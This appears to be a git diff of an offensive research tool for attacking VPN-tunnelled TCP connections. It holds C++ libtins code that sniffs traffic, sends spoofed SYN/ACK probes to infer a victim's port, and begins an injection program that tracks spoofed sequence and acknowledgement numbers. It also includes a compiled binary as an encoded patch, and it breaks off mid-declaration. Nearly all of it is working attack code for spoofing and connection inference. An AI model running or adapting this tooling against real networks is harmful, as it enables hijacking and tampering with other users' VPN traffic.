{ - - const uint32_t& payload = some_pdu.rfind_pdu().payload_size(); - //cout << "Payload Size = " << payload << "\n"; - const int remainder = payload % 115; - } - - return is_running; - -} bool handle_packet(PDU &some_pdu) { const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet + // keep track of the last port we spoofed + if (ip.src_addr() == source_ip) current_spoof_port = some_pdu.rfind_pdu().dport(); + + // in this case we're looking for a packet from the vpn server to the vpn client // // the src ip should be the VPN server and dest ip should be @@ -76,26 +62,40 @@ bool handle_packet(PDU &some_pdu) { return is_running; } + + void sniff_stuff() { SnifferConfiguration config; config.set_promisc_mode(true); - //config.set_filter("ip dst 10.0.0.215"); - // would want to filter out ssh stuff at some point Sniffer sniffer("any", config); sniffer.sniff_loop(handle_packet); } -void sniff_send_stuff() { +int recheck_port(string source_ip, int sport, string dest_ip, int found_port, int num_checks) { - SnifferConfiguration config; - config.set_promisc_mode(true); - Sniffer sniffer("any", config); - sniffer.sniff_loop(handle_send_packet); + PacketSender sender; + NetworkInterface iface("enp0s9"); -} + IP pkt = IP(dest_ip, source_ip) / TCP(found_port, sport); + TCP& tcp = pkt.rfind_pdu(); + tcp.flags(TCP::SYN | TCP::ACK); + int i = 0; + + while (i < num_checks) { + + cout << "Sending recheck probe number " << i << "\n\n"; + sender.send(pkt, iface); + usleep(500); + i ++; + } + + usleep(3000000); + + return 1; +} @@ -125,15 +125,14 @@ int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port count++; i ++; if (count % 50 == 0) { - usleep(1000); - cout << " Current port = " << i << ". Best port = " << best_port << ".\n"; + //usleep(500); + if (verbose) cout << " Current port = " << i << ". Best port = " << best_port << ".\n"; } if (best_port != 0) found = true; } - usleep(1000000); // sleep to give victim time to respond w chack current_port = best_port; @@ -152,13 +151,12 @@ int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port while (j < (current_port + 300) && !found) { tcp.dport(j); // set the packets dest port to current guess sender.send(pkt, iface); - cout << "Current guess port = " << j << " and best port = " << best_port << " \n"; + if (verbose) cout << "Current guess port = " << j << " and best port = " << best_port << " \n"; usleep(10000); j ++; if (best_port != 0) found = true; } - usleep(1000000); if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n"; @@ -210,20 +208,16 @@ int main(int argc, char** argv) { print_divider(2); thread sniff_thread(sniff_stuff); - thread send_sniff_thread(sniff_send_stuff); int p = find_port(source_ip, sport, dest_ip, start_port, end_port); //cout << p << "\n"; print_divider(1); - //if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n"; - - //if (verbose) cout << "Attempting to spoof DNS back on port ..\n"; - //int res = spoof_dns(source_ip, sport, dest_ip, p); + if (rechecking) int res = recheck_port(source_ip, sport, dest_ip, p, 3); + is_running = false; sniff_thread.join(); - send_sniff_thread.join(); return p; diff --git a/server-side-attack/tcp-sside/conn_inf/tcp_send b/server-side-attack/tcp-sside/conn_inf/tcp_send new file mode 100755 index 0000000000000000000000000000000000000000..bc74e9ec813ab6456e3fde832e292e8d07c1b670 GIT binary patch literal 43488 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 -*dz(Q-SBU#p6d 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 F{{gRyFj4>j literal 0 HcmV?d00001 diff --git a/server-side-attack/tcp-sside/inject/Makefile b/server-side-attack/tcp-sside/inject/Makefile new file mode 100644 index 0000000..f21db28 --- /dev/null +++ b/server-side-attack/tcp-sside/inject/Makefile @@ -0,0 +1,2 @@ +all: + g++ -O3 -o send_p3 send.cpp -lpthread -ltins -std=c++11 diff --git a/server-side-attack/tcp-sside/inject/send.cpp b/server-side-attack/tcp-sside/inject/send.cpp new file mode 100644 index 0000000..6bfc757 --- /dev/null +++ b/server-side-attack/tcp-sside/inject/send.cpp @@ -0,0 +1,695 @@ +#include +#include +#include +#include +#include +#include + + +using std::thread; +using std::cout; +using std::vector; +using namespace Tins; + +long current_spoof_seq; +long current_spoof_ack; +long current_min_ack; +long best_seq = 0; +long best_ack; + +vector possible_seqs; +vector possible_acks; + +int num_sent = 0; +int current_round = 1; +bool ack_search = false; +bool track_nums = false; +bool count_chacks = false; +bool sniffed_chack = false; + +bool show = false; +bool testing = true; // if using netcat set to true, else false +int sniff_request = 0; // 0 = off, 1 = sniffing for request, 2 = sniffed that request + +std::string 